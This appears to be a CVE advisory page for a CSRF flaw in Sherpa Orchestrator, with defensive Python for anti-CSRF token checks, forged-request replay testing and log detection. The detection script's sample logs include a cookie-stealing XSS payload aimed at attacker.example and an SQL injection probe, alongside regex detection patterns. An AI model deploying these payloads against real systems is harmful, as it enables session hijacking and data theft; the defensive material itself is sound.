CVE-2025-46547

5.4 MEDIUM

📋 TL;DR

Sherpa Orchestrator 141851 lacks CSRF protection: state-changing requests are accepted on the strength of the session cookie alone, so an attacker who lures a logged-in user to a malicious page can make that user's browser submit requests the user never intended. The actions reachable this way include unauthorized user/role creation, XSS, and SQL injection. Every organization running this version is affected.

💻 Affected Systems

Products:
  • Sherpa Orchestrator
Versions: 141851
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: All deployments of Sherpa Orchestrator version 141851 are vulnerable regardless of configuration.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the Sherpa Orchestrator instance: a forged request that triggers SQL injection exfiltrates or alters backend data, a forged user-creation request adds an attacker-controlled admin account, and a stored XSS payload planted the same way executes for every user who views it.

🟠 Likely Case

Unauthorized user/role creation leading to privilege escalation and data access, or an XSS payload that hijacks other users' sessions.

🟢 If Mitigated

Limited impact when the instance is reachable only from trusted networks, sessions are short-lived behind strong authentication, and monitoring catches unusual user creation or query patterns. Note that CSRF rides a trusted user's browser, so segmentation narrows the victim pool rather than removing it.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

CSRF exploitation needs a logged-in victim to load attacker-controlled content, but once that happens the forged request runs with the victim's privileges; the follow-on vectors listed here (XSS, SQLi, user creation) are well understood and easy to weaponize.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://sherparpa.com

Restart Required: No

Instructions:

1. Check the vendor advisory at sherparpa.com for an updated build.
2. If a patch is available, download and apply it per the vendor's instructions.
3. Verify that state-changing requests now carry an anti-CSRF token that the server validates (or are rejected when the Origin header is foreign).

🔧 Temporary Workarounds

Implement CSRF Tokens

Applies to: all

Add anti-CSRF tokens to every state-changing request in the Sherpa Orchestrator web application and validate them server-side.

Requires modifying the application, or fronting it with a reverse proxy that rejects state-changing requests whose Origin/Referer header is missing or does not match the orchestrator's own host. Without access to the vendor's source, the proxy route is the realistic one; marking the session cookie SameSite=Lax or Strict at the proxy also stops most cross-site POSTs in current browsers.

WAF Configuration

Applies to: all

Configure the WAF to reject state-changing requests with a missing or foreign Origin/Referer header, and to block the XSS and SQL injection payloads that a forged request would deliver.

WAF configuration commands vary by vendor. A forged request body is indistinguishable from a legitimate one, so an Origin/Referer rule is the only WAF control that addresses the CSRF itself; payload signatures only cover the follow-on attacks.

🧯 If You Can't Patch

  • Restrict network access so that only trusted users can reach Sherpa Orchestrator; CSRF still works through a trusted user's browser, so this reduces the victim pool rather than closing the hole
  • Enable detailed logging and monitoring for user and role creation events, unusual SQL query patterns, and script tags in request parameters

🔍 How to Verify

Check if Vulnerable:

Capture a state-changing request (for example a user-creation form submission) in the browser's developer tools or an intercepting proxy, then replay it with the anti-CSRF token removed or altered and with a foreign Origin header. If the application still performs the action, it is vulnerable. Also check whether the session cookie carries a SameSite attribute.
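The following Python is an added example, not Sherpa Orchestrator code and not a published PoC. It models the check a reverse proxy or application middleware applies when it enforces a synchronizer token plus an Origin check (the "Implement CSRF Tokens" workaround above), alongside the vulnerable session-only behaviour, and it generates the forged-request variants the verification step above uses to decide whether an endpoint is protected. The endpoint path, header/field/cookie names, trusted origin and session table are all assumptions for the demonstration.

```python
"""Anti-CSRF enforcement and the replay variants that test for it.

Added example, not Sherpa Orchestrator code: the endpoint path, the
session table, the cookie/header/field names and the trusted origin
are assumptions made for the demonstration.
"""
import copy
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Assumption: the orchestrator is served from this single origin.
ALLOWED_ORIGINS = {"https://orchestrator.example.internal"}
# Constructed session store: session id -> per-session CSRF secret.
SESSION_SECRETS = {"s1": secrets.token_bytes(32)}


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def issue_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(session secret, session id)."""
    return hmac.new(SESSION_SECRETS[session_id], session_id.encode(),
                    hashlib.sha256).hexdigest()


def session_only_check(req: Request) -> int:
    """Models the vulnerable behaviour: any request with a valid session cookie passes."""
    return 200 if req.cookies.get("session") in SESSION_SECRETS else 401


def csrf_check(req: Request) -> int:
    """Hardened behaviour: state-changing requests need a trusted Origin and a valid token."""
    if req.method.upper() in SAFE_METHODS:
        return 200
    session_id = req.cookies.get("session")
    if session_id not in SESSION_SECRETS:
        return 401
    # Browsers attach Origin to cross-site POSTs; a missing or foreign value
    # means the request was not submitted from the orchestrator's own pages.
    if req.headers.get("Origin") not in ALLOWED_ORIGINS:
        return 403
    # Constant-time compare so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(req.form.get("csrf_token", ""), issue_token(session_id)):
        return 403
    return 200


def replay_variants(req: Request) -> dict:
    """Forged versions of a captured request: what an attacker's page could produce."""
    no_token = copy.deepcopy(req)
    no_token.form.pop("csrf_token", None)
    bad_token = copy.deepcopy(req)
    bad_token.form["csrf_token"] = "0" * 64
    foreign_origin = copy.deepcopy(req)
    foreign_origin.headers["Origin"] = "https://attacker.example"  # hypothetical lure page
    no_origin = copy.deepcopy(req)
    no_origin.headers.pop("Origin", None)
    return {"no_token": no_token, "bad_token": bad_token,
            "foreign_origin": foreign_origin, "no_origin": no_origin}


def probe(req: Request, check) -> dict:
    """Status code each forged variant receives from the given checker."""
    return {name: check(variant) for name, variant in replay_variants(req).items()}


def is_protected(req: Request, check) -> bool:
    """An endpoint counts as protected only if every forged variant is refused."""
    return all(status in (401, 403) for status in probe(req, check).values())


def captured_request() -> Request:
    """Constructed stand-in for a legitimate user-creation POST recorded in a proxy."""
    return Request(
        method="POST",
        path="/users/create",  # hypothetical path, not a documented Sherpa endpoint
        headers={"Origin": "https://orchestrator.example.internal"},
        form={"username": "newadmin", "role": "admin", "csrf_token": issue_token("s1")},
        cookies={"session": "s1"},
    )


if __name__ == "__main__":
    req = captured_request()
    print("session-only app:", probe(req, session_only_check),
          "protected:", is_protected(req, session_only_check))
    print("token+origin app:", probe(req, csrf_check),
          "protected:", is_protected(req, csrf_check))
```

Against a real instance the same four variants are replayed at the live endpoint and the observed status (or the side effect, such as a new user appearing) takes the place of the checker; an application that accepts any of them is vulnerable. Keeping both the Origin check and the token means a token leak or an Origin-less client each still hits a second control.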

Check Version:

Check Sherpa Orchestrator web interface or configuration files for version information

Verify Fix Applied:

Verify that every state-changing request carries a CSRF token that the server validates (replaying with a missing, altered, or another session's token must fail), then re-test the XSS and SQL injection issues that a forged request would have been used to reach.

📡 Detection & Monitoring

Log Indicators:

  • Unexpected user creation events
  • Unusual SQL query patterns
  • XSS payloads in request logs

Network Indicators:

  • State-changing requests whose Origin or Referer header is absent or points to a host other than the orchestrator
  • SQL injection attempts in web traffic

SIEM Query (illustrative; field names depend on how the orchestrator's logs are ingested, and a bare *SELECT* match will fire on most legitimate database activity, so narrow it to the patterns below or to queries from the web tier):

source="sherpa_logs" AND (event="user_created" OR event="role_created" OR request="*<script*" OR query="*UNION*SELECT*" OR query="*' OR '*")
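The indicators above turned into detection logic, run over a few constructed log lines. This is an added example, not the orchestrator's own logging format or a vendor-supplied rule: the key=value layout, field names and trusted origin are assumptions. The CSRF rule keys on state-changing requests whose Origin is missing or foreign, which is the one trace a forged request leaves that a legitimate one does not; the SQLi rule looks for quote-balancing and UNION patterns instead of a bare SELECT match.

```python
"""Detection logic for CSRF-driven account changes, XSS and SQLi payloads.

Added example, not Sherpa Orchestrator logging or a vendor SIEM rule.
The key=value log format, the field names and the trusted origin are
assumptions; the sample lines are constructed for the demonstration.
"""
import re

# Assumption: the orchestrator is served from this origin only.
TRUSTED_ORIGINS = {"https://orchestrator.example.internal"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
ACCOUNT_EVENTS = {"user_created", "role_created"}

XSS_RE = re.compile(r"<script|javascript:|\bon\w+\s*=", re.I)
SQLI_RE = re.compile(r"'\s*(or|and)\s*'|union\s+select|;\s*drop\s|--\s*$", re.I)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample: one legitimate admin action (line 2), a forged
# admin-user creation and role creation from a lure page (lines 3-4),
# a forged update carrying a stored-XSS payload (line 5) and a direct
# SQLi probe (line 6). "origin=-" stands for a missing Origin header.
SAMPLE_LOGS = """\
ts=2025-05-01T10:00:01Z user=alice method=GET path=/dashboard origin=https://orchestrator.example.internal
ts=2025-05-01T10:00:05Z user=alice method=POST path=/users/create event=user_created target=svc_backup role=operator origin=https://orchestrator.example.internal referer=https://orchestrator.example.internal/users
ts=2025-05-01T10:02:17Z user=bob method=POST path=/users/create event=user_created target=helpdesk2 role=admin origin=https://attacker.example referer=https://attacker.example/lure.html
ts=2025-05-01T10:02:18Z user=bob method=POST path=/roles/create event=role_created target=sysops origin=-
ts=2025-05-01T10:03:40Z user=carol method=POST path=/robots/update param=name:<script>document.location='https://attacker.example/c?'+document.cookie</script> origin=https://attacker.example
ts=2025-05-01T10:04:02Z user=dave method=GET path=/reports param="id:1' OR '1'='1" origin=https://orchestrator.example.internal
"""


def parse_line(line: str) -> dict:
    """Split a key=value log line into a dict; quoted values keep their spaces."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def evaluate(rec: dict) -> list:
    """Rule names that fire for one parsed record, in a fixed order."""
    hits = []
    # Forged requests arrive with no Origin or with the lure page's origin.
    if rec.get("method") in STATE_CHANGING and rec.get("origin") not in TRUSTED_ORIGINS:
        hits.append("cross_site_state_change")
    # Account and role creation are always worth a look on this version.
    if rec.get("event") in ACCOUNT_EVENTS:
        hits.append("account_or_role_created")
    values = " ".join(rec.values())
    if XSS_RE.search(values):
        hits.append("xss_payload")
    if SQLI_RE.search(values):
        hits.append("sqli_pattern")
    return hits


def scan(text: str) -> list:
    """(line number, rule, acting user) for every rule hit in the log text."""
    alerts = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        for rule in evaluate(rec):
            alerts.append((number, rule, rec.get("user", "?")))
    return alerts


if __name__ == "__main__":
    for number, rule, user in scan(SAMPLE_LOGS):
        print(f"line {number}: {rule} (user={user})")
```

A line that trips both cross_site_state_change and account_or_role_created (lines 3 and 4 in the sample) is the CSRF signature this CVE describes and deserves escalation; account_or_role_created on its own (line 2) is a change-review item rather than an incident.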

🔗 References
